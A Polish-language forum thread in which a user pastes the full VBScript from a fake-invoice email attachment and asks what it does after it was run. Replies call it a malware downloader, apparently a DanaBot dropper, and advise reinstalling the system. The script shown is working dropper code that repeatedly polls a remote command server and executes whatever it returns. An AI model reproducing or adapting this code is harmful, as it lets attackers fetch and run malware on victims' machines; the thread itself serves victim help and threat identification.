Email z załącznikiem w formacie vbs

0

Witam, dostałem emaila niby z fakturą w którego załączniku był plik .zip a wewnątrz jego znajdował się plik z rozszerzeniem .vbs. Treść tego pliku:

'service you fax pc
dim LosdMyArray, Komefaxurls, lossethttpsd, sss
dim cosmyfaxpcurls, zeseyoufaxpcdate

sss = "hellofaxmessage"

Function  toswMypcTextFax()
	On Error Resume Next
    Komefaxurls = "https://www.gdsdfdzooosle.bit/analytics/id123456"
    Set sdlossethttpsd = CreateObject("Microsoft.XMLHTTP")
    sdlossethttpsd.Open "GET", Komefaxurls, False
    sdlossethttpsd.Send
    If (sdlossethttpsd.Status = 200) Then    
       
    Else
     Execute "" + LosdMyArray(2) + ""
    End If
     
End Function

Function  loneSkip(date)
  On Error Resume Next
    Call RseMypcMessage(date)
End Function

Function  KteshowPcFaxPc()
  On Error Resume Next
  While true
    zeseyoufaxpcdate = FormatDateTime(Now, vbLongTime) 
    cosmyfaxpcurls = "http://192.3.118.128/tfaxid/87180/" + zeseyoufaxpcdate + "/" +  sss
       WScript.Sleep 9000
    Call loneSkip(cosmyfaxpcurls)
  Wend
End Function


Function  RseMypcMessage(date)
    On Error Resume Next
    dim zxzoppcffs
    Set zxzoppcffs = createobject("Microsoft.XMLHTTP")
    zxzoppcffs.Open "GET", date, False
    zxzoppcffs.Send
            WScript.Sleep 150
            LosdMyArray = Array(123456, 123, zxzoppcffs.responseText)
			toswMypcTextFax()
End Function

Call KteshowPcFaxPc()

Co powinienem zrobić jeśli otworzyłem ten plik? Co ten skrypt robi? Z góry dziękuję za pomoc.

0
Karin_93 napisał(a):

Co powinienem zrobić jeśli otworzyłem ten plik?

W jaki sposób go otworzyłeś? W jakimś edytorze tekstowym? dwuklikiem na plik?

Co ten skrypt robi?

Nie znam tego języka (nie moja działka), ale od czasu do czasu czytam artykuły w serwisach poświęconych bezpieczeństwu (Z3S, niebezpiecznik, sekurak itd.) i jest to raczej typowy przykład skryptu pobierającego malware z serwera. A syf jaki zostanie zassany może robić różne rzeczy, bardzo nieprzyjemne rzeczy.

Po co w ogóle otwierałeś załącznik, skoro prawdziwe faktury ~zawsze dostarczane są w postaci pliku .pdf?

0

Plik otrzymała moja dziewczyna i to ona go otworzyła poprzez dwukrotne kliknięcie. Ja otworzyłem go tylko w trybie edycji w notatniku.

Po co w ogóle otwierałeś załącznik, skoro prawdziwe faktury ~zawsze dostarczane są w postaci pliku .pdf?

Mam tego świadomość i uczulałem innych żeby nie otwierali nigdy podejrzanych załączników, jak widać bezskutecznie..

1

Skrypt, który wkleiłeś zazwyczaj dropuje danabota: https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0
Możliwe, że przy uruchomieniu droppera serwer C2 akurat nic nie zrzucał ale ja dla pewności przeorałbym system.

1 użytkowników online, w tym zalogowanych: 0, gości: 1